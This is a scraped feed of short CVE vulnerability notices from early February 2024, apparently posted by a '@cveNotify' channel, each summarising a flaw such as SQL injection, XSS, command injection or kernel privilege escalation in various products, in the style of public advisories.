🚨 CVE-2009-3620The ATI Rage 128 (aka r128) driver in the Linux kernel before 2.6.31-git11 does not properly verify Concurrent Command Engine (CCE) state initialization, which allows local users to cause a denial of service (NULL pointer dereference and system crash) or possibly gain privileges via unspecified ioctl calls.🎖@cveNotify |
|
| 2024-02-09 00:37:26 |
🚨 CVE-2009-0949The ippReadIO function in cups/ipp.c in cupsd in CUPS before 1.3.10 does not properly initialize memory for IPP request packets, which allows remote attackers to cause a denial of service (NULL pointer dereference and daemon crash) via a scheduler request with two consecutive IPP_TAG_UNSUPPORTED tags.🎖@cveNotify |
|
| 2024-02-09 00:37:25 |
🚨 CVE-2004-0421The Portable Network Graphics library (libpng) 1.0.15 and earlier allows attackers to cause a denial of service (crash) via a malformed PNG image file that triggers an error that causes an out-of-bounds read when creating the error message.🎖@cveNotify |
|
| 2024-02-09 00:37:24 |
🚨 CVE-2002-1850mod_cgi in Apache 2.0.39 and 2.0.40 allows local users and possibly remote attackers to cause a denial of service (hang and memory consumption) by causing a CGI script to send a large amount of data to stderr, which results in a read/write deadlock between httpd and the CGI script.🎖@cveNotify |
|
| 2024-02-09 00:07:36 |
🚨 CVE-2009-2692The Linux kernel 2.6.0 through 2.6.30.4, and 2.4.4 through 2.4.37.4, does not initialize all function pointers for socket operations in proto_ops structures, which allows local users to trigger a NULL pointer dereference and gain privileges by using mmap to map page zero, placing arbitrary code on this page, and then invoking an unavailable operation, as demonstrated by the sendpage operation (sock_sendpage function) on a PF_PPPOX socket.🎖@cveNotify |
|
| 2024-02-09 00:07:32 |
🚨 CVE-2008-3688sockethandler.cpp in HTTP Antivirus Proxy (HAVP) 0.88 allows remote attackers to cause a denial of service (hang) by connecting to a non-responsive server, which triggers an infinite loop due to an uninitialized variable.🎖@cveNotify |
|
| 2024-02-09 00:07:31 |
🚨 CVE-2005-1036FreeBSD 5.x to 5.4 on AMD64 does not properly initialize the IO permission bitmap used to allow user access to certain hardware, which allows local users to bypass intended access restrictions to cause a denial of service, obtain sensitive information, and possibly gain privileges.🎖@cveNotify |
|
| 2024-02-08 22:37:38 |
🚨 CVE-2023-43519Memory corruption in video while parsing the Videoinfo, when the size of atom is greater than the videoinfo size.🎖@cveNotify |
|
| 2024-02-08 22:37:31 |
🚨 CVE-2023-33069Memory corruption in Audio while processing the calibration data returned from ACDB loader.🎖@cveNotify |
|
| 2024-02-08 22:37:30 |
🚨 CVE-2023-33068Memory corruption in Audio while processing IIR config data from AFE calibration block.🎖@cveNotify |
|
| 2024-02-08 22:37:26 |
🚨 CVE-2023-33065Information disclosure in Audio while accessing AVCS services from ADSP payload.🎖@cveNotify |
|
| 2024-02-08 22:37:25 |
🚨 CVE-2023-30559The firmware update package for the wireless card is not properly signed and can be modified.🎖@cveNotify |
|
| 2024-02-08 22:07:25 |
🚨 CVE-2023-43522Transient DOS while key unwrapping process, when the given encrypted key is empty or NULL.🎖@cveNotify |
|
| 2024-02-08 22:07:24 |
🚨 CVE-2023-43520Memory corruption when AP includes TID to link mapping IE in the beacons and STA is parsing the beacon TID to link mapping IE.🎖@cveNotify |
|
| 2024-02-08 21:37:36 |
🚨 CVE-2024-24498Unrestricted File Upload vulnerability in Employee Management System 1.0 allows a remote attacker to execute arbitrary code via the edit-photo.php component.🎖@cveNotify |
|
| 2024-02-08 21:37:35 |
🚨 CVE-2024-24497SQL Injection vulnerability in Employee Management System v.1.0 allows a remote attacker to execute arbitrary SQL commands via the txtusername and txtpassword parameters in the login.php components.🎖@cveNotify |
|
| 2024-02-08 21:37:32 |
🚨 CVE-2024-24496An issue in Daily Habit Tracker v.1.0 allows a remote attacker to manipulate trackers via the home.php, add-tracker.php, delete-tracker.php, update-tracker.php components.🎖@cveNotify |
|
| 2024-02-08 21:37:31 |
🚨 CVE-2024-23756The HTTP PUT and DELETE methods are enabled in the Plone official Docker version 5.2.13 (5221), allowing unauthenticated attackers to execute dangerous actions such as uploading files to the server or deleting them.🎖@cveNotify |
|
| 2024-02-08 21:37:30 |
🚨 CVE-2023-43536Transient DOS while parse fils IE with length equal to 1.🎖@cveNotify |
|
| 2024-02-08 21:37:26 |
🚨 CVE-2023-43534Memory corruption while validating the TID to Link Mapping action request frame, when a station connects to an access point.🎖@cveNotify |
|
| 2024-02-08 21:37:25 |
🚨 CVE-2023-47022An issue in NCR Terminal Handler v.1.5.1 allows a remote attacker to execute arbitrary code via a crafted script to the payload parameter.🎖@cveNotify |
|
| 2024-02-08 21:07:33 |
🚨 CVE-2003-0174The LDAP name service (nsd) in IRIX 6.5.19 and earlier does not properly verify if the USERPASSWORD attribute has been provided by an LDAP server, which could allow attackers to log in without a password.🎖@cveNotify |
|
| 2024-02-08 21:07:26 |
🚨 CVE-2002-1796ChaiVM EZloader for HP color LaserJet 4500 and 4550 and HP LaserJet 4100 and 8150 does not properly verify JAR signatures for new services, which allows local users to load unauthorized Chai services.🎖@cveNotify |
|
| 2024-02-08 21:07:25 |
🚨 CVE-2000-1218The default configuration for the domain name resolver for Microsoft Windows 98, NT 4.0, 2000, and XP sets the QueryIpMatching parameter to 0, which causes Windows to accept DNS updates from hosts that it did not query, which allows remote attackers to poison the DNS cache.🎖@cveNotify |
|
| 2024-02-08 21:07:24 |
🚨 CVE-1999-1549Lynx 2.x does not properly distinguish between internal and external HTML, which may allow a local attacker to read a "secure" hidden form value from a temporary file and craft a LYNXOPTIONS: URL that causes Lynx to modify the user's configuration file and execute commands.🎖@cveNotify |
|
| 2024-02-08 20:37:32 |
🚨 CVE-2002-2068Eraser 5.3 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.🎖@cveNotify |
|
| 2024-02-08 20:37:26 |
🚨 CVE-2002-2067East-Tec Eraser 2002 does not clear Windows alternate data streams that are attached to files on NTFS file systems, which allows attackers to recover sensitive information that was supposed to be deleted.🎖@cveNotify |
|
| 2024-02-08 20:37:25 |
🚨 CVE-2000-0552ICQwebmail client for ICQ 2000A creates a world readable temporary file during login and does not delete it, which allows local users to obtain sensitive information.🎖@cveNotify |
|
| 2024-02-08 20:37:24 |
🚨 CVE-1999-1127Windows NT 4.0 does not properly shut down invalid named pipe RPC connections, which allows remote attackers to cause a denial of service (resource exhaustion) via a series of connections containing malformed data, aka the "Named Pipes Over RPC" vulnerability.🎖@cveNotify |
|
| 2024-02-08 20:07:32 |
🚨 CVE-2022-42745CandidATS version 3.0.0 allows an external attacker to read arbitrary files from the server. This is possible because the application is vulnerable to XXE.🎖@cveNotify |
|
| 2024-02-08 20:07:25 |
🚨 CVE-2004-2061RiSearch 1.0.01 and RiSearch Pro 3.2.06 allows remote attackers to use the show.pl script as an open proxy, or read arbitrary local files, by setting the url parameter to a (1) http://, (2) ftp://, or (3) file:// URL.🎖@cveNotify |
|
| 2024-02-08 20:07:24 |
🚨 CVE-2002-1484DB4Web server, when configured to use verbose debug messages, allows remote attackers to use DB4Web as a proxy and attempt TCP connections to other systems (port scan) via a request for a URL that specifies the target IP address and port, which produces a connection status in the resulting error message.🎖@cveNotify |
|
| 2024-02-08 19:37:38 |
🚨 CVE-2023-38273IBM Cloud Pak System 2.3.1.1, 2.3.2.0, and 2.3.3.7 uses an inadequate account lockout setting that could allow a remote attacker to brute force account credentials. IBM X-Force ID: 260733.🎖@cveNotify |
|
| 2024-02-08 19:37:31 |
🚨 CVE-2023-20221A vulnerability in the web-based management interface of Cisco IP Phone 6800, 7800, and 8800 Series with Multiplatform Firmware could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack against a user of the web-based management interface of an affected system. This vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading an authenticated user of the interface to follow a crafted link. A successful exploit could allow the attacker to perform a factory reset of the affected device, resulting in a Denial of Service (DoS) condition.🎖@cveNotify |
|
| 2024-02-08 19:37:30 |
🚨 CVE-2023-20180A vulnerability in the web interface of Cisco Webex Meetings could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack on an affected system. This vulnerability is due to insufficient CSRF protections for the web interface on an affected system. An attacker could exploit this vulnerability by persuading a user of the interface to click a malicious link. A successful exploit could allow the attacker to perform arbitrary actions. These actions could include joining meetings and scheduling training sessions.🎖@cveNotify |
|
| 2024-02-08 19:37:26 |
🚨 CVE-2002-1914dump 0.4 b10 through b29 allows local users to cause a denial of service (execution prevention) by using flock() to lock the /etc/dumpdates file.🎖@cveNotify |
|
| 2024-02-08 19:37:25 |
🚨 CVE-2000-0338Concurrent Versions Software (CVS) uses predictable temporary file names for locking, which allows local users to cause a denial of service by creating the lock directory before it is created for use by a legitimate CVS user.🎖@cveNotify |
|
| 2024-02-08 19:07:27 |
🚨 CVE-2010-1866The dechunk filter in PHP 5.3 through 5.3.2, when decoding an HTTP chunked encoding stream, allows context-dependent attackers to cause a denial of service (crash) and possibly trigger memory corruption via a negative chunk size, which bypasses a signed comparison, related to an integer overflow in the chunk size decoder.🎖@cveNotify |
|
| 2024-02-08 19:07:26 |
🚨 CVE-2002-0391Integer overflow in xdr_array function in RPC servers for operating systems that use libc, glibc, or other code based on SunRPC including dietlibc, allows remote attackers to execute arbitrary code by passing a large number of arguments to xdr_array through RPC services such as rpc.cmsd and dmispd.🎖@cveNotify |
|
| 2024-02-08 19:07:25 |
🚨 CVE-2002-0639Integer overflow in sshd in OpenSSH 2.9.9 through 3.3 allows remote attackers to execute arbitrary code during challenge response authentication (ChallengeResponseAuthentication) when OpenSSH is using SKEY or BSD_AUTH authentication.🎖@cveNotify |
|
| 2024-02-08 18:37:32 |
🚨 CVE-2005-1141Integer overflow in the readpgm function in pnm.c for GOCR 0.40, when using the netpbm library, allows remote attackers to execute arbitrary code via a PNM file with large width and height values, which leads to a heap-based buffer overflow.🎖@cveNotify |
|
| 2024-02-08 18:07:37 |
🚨 CVE-2024-22287Cross-Site Request Forgery (CSRF) vulnerability in Lud?k Melichar Better Anchor Links allows Cross-Site Scripting (XSS).This issue affects Better Anchor Links: from n/a through 1.7.5.🎖@cveNotify |
|
| 2024-02-08 18:07:36 |
🚨 CVE-2004-2013Integer overflow in the SCTP_SOCKOPT_DEBUG_NAME SCTP socket option in socket.c in the Linux kernel 2.4.25 and earlier allows local users to execute arbitrary code via an optlen value of -1, which causes kmalloc to allocate 0 bytes of memory.🎖@cveNotify |
|
| 2024-02-08 17:37:44 |
🚨 CVE-2023-44313Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests.This issue affects Apache ServiceComb before 2.1.0(include).Users are recommended to upgrade to version 2.2.0, which fixes the issue.🎖@cveNotify |
|
| 2024-02-08 17:37:38 |
🚨 CVE-2023-44312Exposure of Sensitive Information to an Unauthorized Actor in Apache ServiceComb Service-Center.This issue affects Apache ServiceComb Service-Center before 2.1.0 (include).Users are recommended to upgrade to version 2.2.0, which fixes the issue.🎖@cveNotify |
|
| 2024-02-08 17:37:37 |
🚨 CVE-2023-40547A remote code execution vulnerability was found in Shim. The Shim boot support trusts attacker-controlled values when parsing an HTTP response. This flaw allows an attacker to craft a specific malicious HTTP request, leading to a completely controlled out-of-bounds write primitive and complete system compromise. This flaw is only exploitable during the early boot phase, an attacker needs to perform a Man-in-the-Middle or compromise the boot server to be able to exploit this vulnerability successfully.🎖@cveNotify |
|
| 2024-02-08 17:37:36 |
🚨 CVE-2020-15708Ubuntu's packaging of libvirt in 20.04 LTS created a control socket with world read and write permissions. An attacker could use this to overwrite arbitrary files or execute arbitrary code.🎖@cveNotify |
|
| 2024-02-08 17:07:44 |
🚨 CVE-2023-6943Use of Externally-Controlled Input to Select Classes or Code ('Unsafe Reflection') vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to execute a malicious code by RPC with a path to a malicious library while connected to the products.🎖@cveNotify |
|
| 2024-02-08 17:07:37 |
🚨 CVE-2023-6942Missing Authentication for Critical Function vulnerability in Mitsubishi Electric Corporation EZSocket versions 3.0 and later, FR Configurator2 all versions, GT Designer3 Version1(GOT1000) all versions, GT Designer3 Version1(GOT2000) all versions, GX Works2 versions 1.11M and later, GX Works3 all versions, MELSOFT Navigator versions 1.04E and later, MT Works2 all versions, MX Component versions 4.00A and later and MX OPC Server DA/UA all versions allows a remote unauthenticated attacker to bypass authentication by sending specially crafted packets and connect to the products illegally.🎖@cveNotify |
|
| 2024-02-08 17:07:36 |
🚨 CVE-2024-23826spbu_se_site is the website of the Department of System Programming of St. Petersburg State University. Before 2024.01.29, when uploading an avatar image, an authenticated user may intentionally use a large Unicode filename which would lead to a server-side denial of service under Windows. This is due to no limitation of the length of the filename and the costly use of the Unicode normalization with the form NFKD on Windows OS. This vulnerability was fixed in the 2024.01.29 release.🎖@cveNotify |
|
| 2024-02-08 17:07:35 |
🚨 CVE-2023-52389UTF32Encoding.cpp in POCO has a Poco::UTF32Encoding integer overflow and resultant stack buffer overflow because Poco::UTF32Encoding::convert() and Poco::UTF32::queryConvert() may return a negative integer if a UTF-32 byte sequence evaluates to a value of 0x80000000 or higher. This is fixed in 1.11.8p2, 1.12.5p2, and 1.13.0.🎖@cveNotify |
|
| 2024-02-08 16:37:46 |
🚨 CVE-2024-0564A flaw was found in the Linux kernel's memory deduplication mechanism. The max page sharing of Kernel Samepage Merging (KSM), added in Linux kernel version 4.4.0-96.119, can create a side channel. When the attacker and the victim share the same host and the default setting of KSM is "max page sharing=256", it is possible for the attacker to time the unmap to merge with the victim's page. The unmapping time depends on whether it merges with the victim's page and additional physical pages are created beyond the KSM's "max page share". Through these operations, the attacker can leak the victim's page.🎖@cveNotify |
|
| 2024-02-08 16:37:40 |
🚨 CVE-2023-6040An out-of-bounds access vulnerability involving netfilter was reported and fixed as: f1082dd31fe4 (netfilter: nf_tables: Reject tables of unsupported family); While creating a new netfilter table, lack of a safeguard against invalid nf_tables family (pf) values within `nf_tables_newtable` function enables an attacker to achieve out-of-bounds access.🎖@cveNotify |
|
| 2024-02-08 16:37:39 |
🚨 CVE-2023-6176A null pointer dereference flaw was found in the Linux kernel API for the cryptographic algorithm scatterwalk functionality. This issue occurs when a user constructs a malicious packet with specific socket configuration, which could allow a local user to crash the system or escalate their privileges on the system.🎖@cveNotify |
|
| 2024-02-08 16:37:38 |
🚨 CVE-2023-5345A use-after-free vulnerability in the Linux kernel's fs/smb/client component can be exploited to achieve local privilege escalation.In case of an error in smb3_fs_context_parse_param, ctx->password was freed but the field was not set to NULL which could lead to double free.We recommend upgrading past commit e6e43b8aa7cd3c3af686caf0c2e11819a886d705.🎖@cveNotify |
|
| 2024-02-08 15:37:55 |
🚨 CVE-2009-3897Dovecot 1.2.x before 1.2.8 sets 0777 permissions during creation of certain directories at installation time, which allows local users to access arbitrary user accounts by replacing the auth socket, related to the parent directories of the base_dir directory, and possibly the base_dir directory itself.🎖@cveNotify |
|
| 2024-02-08 15:37:54 |
🚨 CVE-2009-3482TrustPort Antivirus before 2.8.0.2266 and PC Security before 2.0.0.1291 use weak permissions (Everyone: Full Control) for files under %PROGRAMFILES%, which allows local users to gain privileges by replacing executables with Trojan horse programs.🎖@cveNotify |
|
| 2024-02-08 15:37:53 |
🚨 CVE-2004-0816Integer underflow in the firewall logging rules for iptables in Linux before 2.6.8 allows remote attackers to cause a denial of service (application crash) via a malformed IP packet.🎖@cveNotify |
|
| 2024-02-08 15:07:36 |
🚨 CVE-2009-3289The g_file_copy function in glib 2.0 sets the permissions of a target file to the permissions of a symbolic link (777), which allows user-assisted local users to modify files of other users, as demonstrated by using Nautilus to modify the permissions of the user home directory.🎖@cveNotify |
|
| 2024-02-08 13:37:30 |
🚨 CVE-2024-1150Improper Verification of Cryptographic Signature vulnerability in Snow Software Inventory Agent on Unix allows File Manipulation through Snow Update Packages.This issue affects Inventory Agent: through 7.3.1.🎖@cveNotify |
|
| 2024-02-08 13:37:26 |
🚨 CVE-2023-7169Authentication Bypass by Spoofing vulnerability in Snow Software Snow Inventory Agent on Windows allows Signature Spoof.This issue affects Snow Inventory Agent: through 6.14.5. Customers advised to upgrade to version 7.0🎖@cveNotify |
|
| 2024-02-08 13:37:25 |
🚨 CVE-2024-0822An authentication bypass vulnerability was found in overt-engine. This flaw allows the creation of users in the system without authentication due to a flaw in the CreateUserSession command.🎖@cveNotify |
|
| 2024-02-08 12:37:39 |
🚨 CVE-2024-24880Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Apollo13Themes Apollo13 Framework Extensions allows Stored XSS.This issue affects Apollo13 Framework Extensions: from n/a through 1.9.2.🎖@cveNotify |
|
| 2024-02-08 12:37:35 |
🚨 CVE-2023-6564An issue has been discovered in GitLab EE Premium and Ultimate affecting versions 16.4.3, 16.5.3, and 16.6.1. In projects using subgroups to define who can push and/or merge to protected branches, there may have been instances in which subgroup members with the Developer role were able to push or merge to protected branches.🎖@cveNotify |
|
| 2024-02-08 12:37:34 |
🚨 CVE-2023-6517Exposure of Sensitive Information Due to Incompatible Policies vulnerability in Mia Technology Inc. MİA-MED allows Collect Data as Provided by Users.This issue affects MİA-MED: before 1.0.7.🎖@cveNotify |
|
| 2024-02-08 11:37:24 |
🚨 CVE-2024-24886Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Acowebs Product Labels For Woocommerce (Sale Badges) allows Stored XSS.This issue affects Product Labels For Woocommerce (Sale Badges): from n/a through 1.5.3.🎖@cveNotify |
|
| 2024-02-08 09:37:26 |
🚨 CVE-2024-23452Request smuggling vulnerability in HTTP server in Apache bRPC 0.9.5~1.7.0 on all platforms allows attacker to smuggle request.Vulnerability Cause Description:The http_parser does not comply with the RFC-7230 HTTP 1.1 specification.Attack scenario:If a message is received with both a Transfer-Encoding and a Content-Length header field, such a message might indicate an attempt to perform request smuggling or response splitting.One particular attack scenario is that a bRPC made http server on the backend receiving requests in one persistent connection from frontend server that uses TE to parse request with the logic that 'chunk' is contained in the TE field. in that case an attacker can smuggle a request into the connection to the backend server. Solution:You can choose one solution from below:1. Upgrade bRPC to version 1.8.0, which fixes this issue. Download link: https://github.com/apache/brpc/releases/tag/1.8.0 2. Apply this patch: https://github.com/apache/brpc/pull/2518🎖@cveNotify |
|
| 2024-02-08 09:37:25 |
🚨 CVE-2024-0965The Simple Page Access Restriction plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 1.0.21 via the REST API. This makes it possible for unauthenticated attackers to bypass the plugin's page restriction and view page content.🎖@cveNotify |
|
| 2024-02-08 09:37:24 |
🚨 CVE-2024-0297A vulnerability was found in Totolink N200RE 9.3.5u.6139_B20201216 and classified as critical. This issue affects the function UploadFirmwareFile of the file /cgi-bin/cstecgi.cgi. The manipulation of the argument FileName leads to os command injection. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used. The associated identifier of this vulnerability is VDB-249863. NOTE: The vendor was contacted early about this disclosure but did not respond in any way.🎖@cveNotify |
|
| 2024-02-08 06:37:25 |
🚨 CVE-2024-24091Yealink Meeting Server before v26.0.0.66 was discovered to contain an OS command injection vulnerability via the file upload interface.🎖@cveNotify |
|
| 2024-02-08 06:37:24 |
🚨 CVE-2024-0511The Royal Elementor Addons and Templates plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.87. This is due to missing or incorrect nonce validation on the wpr_update_form_action_meta function. This makes it possible for unauthenticated attackers to post metadata via a forged request granted they can trick a site administrator into performing an action such as clicking on a link.🎖@cveNotify |
|
| 2024-02-08 05:37:25 |
🚨 CVE-2024-24202An arbitrary file upload vulnerability in /upgrade/control.php of ZenTao Community Edition v18.10, ZenTao Biz v8.10, and ZenTao Max v4.10 allows attackers to execute arbitrary code via uploading a crafted .txt file.🎖@cveNotify |
|
| 2024-02-08 04:37:26 |
🚨 CVE-2024-25148In Liferay Portal 7.2.0 through 7.4.1, and older unsupported versions, and Liferay DXP 7.3 before service pack 3, 7.2 before fix pack 15, and older unsupported versions the `doAsUserId` URL parameter may get leaked when creating linked content using the WYSIWYG editor and while impersonating a user. This may allow remote authenticated users to impersonate a user after accessing the linked content.🎖@cveNotify |
|
| 2024-02-08 04:37:25 |
🚨 CVE-2023-5665The Payment Forms for Paystack plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's shortcodes in all versions up to, and including, 3.4.1 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers with contributor-level and above permissions to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.🎖@cveNotify |
|
| 2024-02-08 04:07:32 |
🚨 CVE-2023-47568A SQL injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to inject malicious code via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.5.2645 build 20240116 and laterQTS 4.5.4.2627 build 20231225 and laterQuTS hero h5.1.5.2647 build 20240118 and laterQuTS hero h4.5.4.2626 build 20231225 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-02-08 04:07:25 |
🚨 CVE-2023-39297An OS command injection vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to execute commands via a network.We have already fixed the vulnerability in the following versions:QTS 5.1.4.2596 build 20231128 and laterQTS 4.5.4.2627 build 20231225 and laterQuTS hero h5.1.4.2596 build 20231128 and laterQuTS hero h4.5.4.2626 build 20231225 and laterQuTScloud c5.1.5.2651 and later🎖@cveNotify |
|
| 2024-02-08 04:07:24 |
🚨 CVE-2023-32967An incorrect authorization vulnerability has been reported to affect several QNAP operating system versions. If exploited, the vulnerability could allow authenticated users to bypass intended access restrictions via a network.QTS 5.x, QuTS hero are not affected.We have already fixed the vulnerability in the following versions:QuTScloud c5.1.5.2651 and laterQTS 4.5.4.2627 build 20231225 and later🎖@cveNotify |
|
| 2024-02-08 03:37:32 |
🚨 CVE-2023-48974Cross Site Scripting vulnerability in Axigen WebMail v.10.5.7 and before allows a remote attacker to escalate privileges via a crafted script to the serverName_input parameter.🎖@cveNotify |
|
| 2024-02-08 03:37:26 |
🚨 CVE-2024-24806libuv is a multi-platform support library with a focus on asynchronous I/O. The `uv_getaddrinfo` function in `src/unix/getaddrinfo.c` (and its windows counterpart `src/win/getaddrinfo.c`), truncates hostnames to 256 characters before calling `getaddrinfo`. This behavior can be exploited to create addresses like `0x00007f000001`, which are considered valid by `getaddrinfo` and could allow an attacker to craft payloads that resolve to unintended IP addresses, bypassing developer checks. The vulnerability arises due to how the `hostname_ascii` variable (with a length of 256 bytes) is handled in `uv_getaddrinfo` and subsequently in `uv__idna_toascii`. When the hostname exceeds 256 characters, it gets truncated without a terminating null byte. As a result attackers may be able to access internal APIs or for websites (similar to MySpace) that allows users to have `username.example.com` pages. Internal services that crawl or cache these user pages can be exposed to SSRF attacks if a malicious user chooses a long vulnerable username. This issue has been addressed in release version 1.48.0. Users are advised to upgrade. There are no known workarounds for this vulnerability.🎖@cveNotify |
|
| 2024-02-08 03:37:25 |
🚨 CVE-2023-6840An issue has been discovered in GitLab EE affecting all versions from 16.4 prior to 16.6.7, 16.7 prior to 16.7.5, and 16.8 prior to 16.8.2 which allows a maintainer to change the name of a protected branch that bypasses the security policy added to block MR.🎖@cveNotify |
|
| 2024-02-08 03:37:24 |
🚨 CVE-2023-6736An issue has been discovered in GitLab EE affecting all versions starting from 11.3 before 16.6.7, all versions starting from 16.7 before 16.7.5, all versions starting from 16.8 before 16.8.2. It was possible for an attacker to cause a client-side denial of service using malicious crafted content in the CODEOWNERS file.🎖@cveNotify |
|
| 2024-02-08 02:37:46 |
🚨 CVE-2024-22394An improper authentication vulnerability has been identified in SonicWall SonicOS SSL-VPN feature, which in specific conditions could allow a remote attacker to bypass authentication. This issue affects only firmware version SonicOS 7.1.1-7040.🎖@cveNotify |
|
| 2024-02-08 02:37:45 |
🚨 CVE-2020-4053In Helm greater than or equal to 3.0.0 and less than 3.2.4, a path traversal attack is possible when installing Helm plugins from a tar archive over HTTP. It is possible for a malicious plugin author to inject a relative path into a plugin archive, and copy a file outside of the intended directory. This has been fixed in 3.2.4.🎖@cveNotify |
|
| 2024-02-08 02:37:41 |
🚨 CVE-2017-15129A use-after-free vulnerability was found in network namespaces code affecting the Linux kernel before 4.14.11. The function get_net_ns_by_id() in net/core/net_namespace.c does not check for the net::count value after it has found a peer network in netns_ids idr, which could lead to double free and memory corruption. This vulnerability could allow an unprivileged local user to induce kernel memory corruption on the system, leading to a crash. Due to the nature of the flaw, privilege escalation cannot be fully ruled out, although it is thought to be unlikely.🎖@cveNotify |
|
| 2024-02-08 02:37:40 |
🚨 CVE-2008-3282Integer overflow in the rtl_allocateMemory function in sal/rtl/source/alloc_global.c in the memory allocator in OpenOffice.org (OOo) 2.4.1, on 64-bit platforms, allows remote attackers to cause a denial of service (application crash) or possibly execute arbitrary code via a crafted document, related to a "numeric truncation error," a different vulnerability than CVE-2008-2152.🎖@cveNotify |
|
| 2024-02-08 02:37:35 |
🚨 CVE-2006-6811KsIRC 1.3.12 allows remote attackers to cause a denial of service (crash) via a long PRIVMSG string when connecting to an Internet Relay Chat (IRC) server, which causes an assertion failure and results in a NULL pointer dereference. NOTE: this issue was originally reported as a buffer overflow.🎖@cveNotify |
|
| 2024-02-08 02:37:34 |
🚨 CVE-2004-1083Apache for Apple Mac OS X 10.2.8 and 10.3.6 restricts access to files in a case sensitive manner, but the Apple HFS+ filesystem accesses files in a case insensitive manner, which allows remote attackers to read .DS_Store files and files beginning with ".ht" using alternate capitalization.🎖@cveNotify |
|
| 2024-02-08 02:37:29 |
🚨 CVE-2002-2119Novell eDirectory 8.6.2 and 8.7 use case insensitive passwords, which makes it easier for remote attackers to conduct brute force password guessing.🎖@cveNotify |
|
| 2024-02-08 02:37:28 |
🚨 CVE-2001-1125Symantec LiveUpdate before 1.6 does not use cryptography to ensure the integrity of download files, which allows remote attackers to execute arbitrary code via DNS spoofing of the update.symantec.com site.🎖@cveNotify |
|
| 2024-02-08 02:07:33 |
🚨 CVE-2023-22836In cases where a multi-tenant stack user is operating Foundry’s Linter service, and the user changes a group name from the default value, the renamed value may be visible to the rest of the stack’s tenants.🎖@cveNotify |
|
| 2024-02-08 02:07:26 |
🚨 CVE-2023-1705Missing Authorization vulnerability in Forcepoint F|One SmartEdge Agent on Windows (bgAutoinstaller service modules) allows Privilege Escalation, Functionality Bypass.This issue affects F|One SmartEdge Agent: before 1.7.0.230330-554.🎖@cveNotify |
|
| 2024-02-08 02:07:25 |
🚨 CVE-2019-20916The pip package before 19.2 for Python allows Directory Traversal when a URL is given in an install command, because a Content-Disposition header can have ../ in a filename, as demonstrated by overwriting the /root/.ssh/authorized_keys file. This occurs in _download_http_url in _internal/download.py.🎖@cveNotify |
|
| 2024-02-08 01:37:33 |
🚨 CVE-2024-24023A SQL injection vulnerability exists in Novel-Plus v4.3.0-RC1 and prior. An attacker can pass specially crafted offset, limit, and sort parameters to perform SQL injection via /novel/bookContent/list.🎖@cveNotify |
|
| 2024-02-08 01:37:26 |
🚨 CVE-2024-21917A vulnerability exists in Rockwell Automation FactoryTalk® Service Platform that allows a malicious user to obtain the service token and use it for authentication on another FTSP directory. This is due to the lack of digital signing between the FTSP service token and directory. If exploited, a malicious user could potentially retrieve user information and modify settings without any authentication.🎖@cveNotify |
|
| 2024-02-08 01:37:25 |
🚨 CVE-2023-44077Studio Network Solutions ShareBrowser before 7.0 on macOS mishandles signature verification, aka PMP-2636.🎖@cveNotify |
|
| 2024-02-08 00:07:24 |
🚨 CVE-2024-24940In JetBrains IntelliJ IDEA before 2023.3.3 path traversal was possible when unpacking archives🎖@cveNotify |
|
| 2024-02-07 23:37:32 |
🚨 CVE-2024-24848Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in MJS Software PT Sign Ups – Beautiful volunteer sign ups and management made easy allows Stored XSS.This issue affects PT Sign Ups – Beautiful volunteer sign ups and management made easy: from n/a through 1.0.4.🎖@cveNotify |
|
| 2024-02-07 23:37:25 |
🚨 CVE-2024-24839Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Gordon Böhme, Antonio Leutsch Structured Content (JSON-LD) #wpsc allows Stored XSS.This issue affects Structured Content (JSON-LD) #wpsc: from n/a through 1.6.1.🎖@cveNotify |
|
| 2024-02-07 23:37:24 |
🚨 CVE-2024-24838Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in Five Star Plugins Five Star Restaurant Reviews allows Stored XSS.This issue affects Five Star Restaurant Reviews: from n/a through 2.3.5.🎖@cveNotify |
|
| 2024-02-07 23:07:33 |
🚨 CVE-2024-24265gpac v2.2.1 was discovered to contain a memory leak via the dst_props variable in the gf_filter_pid_merge_properties_internal function.🎖@cveNotify |
|
| 2024-02-07 23:07:26 |
🚨 CVE-2024-24259mupdf v1.23.9 was discovered to contain a memory leak via the menuEntry variable in the glutAddMenuEntry function.🎖@cveNotify |
|
| 2024-02-07 23:07:25 |
🚨 CVE-2024-24258mupdf v1.23.9 was discovered to contain a memory leak via the menuEntry variable in the glutAddSubMenu function.🎖@cveNotify |
|
| 2024-02-07 22:37:32 |
🚨 CVE-2024-23448An issue was discovered whereby APM Server could log at ERROR level, a response from Elasticsearch indicating that indexing the document failed and that response would contain parts of the original document. Depending on the nature of the document that the APM Server attempted to ingest, this could lead to the insertion of sensitive or private information in the APM Server logs.🎖@cveNotify |
|
| 2024-02-07 22:37:26 |
